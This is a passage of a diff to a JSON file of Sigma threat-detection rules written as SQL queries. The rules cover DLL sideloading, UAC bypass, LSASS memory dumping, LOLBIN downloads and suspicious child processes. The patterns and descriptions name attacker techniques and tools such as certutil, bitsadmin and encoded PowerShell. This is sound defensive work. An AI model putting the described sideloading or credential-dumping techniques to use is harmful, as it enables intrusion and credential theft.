ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE 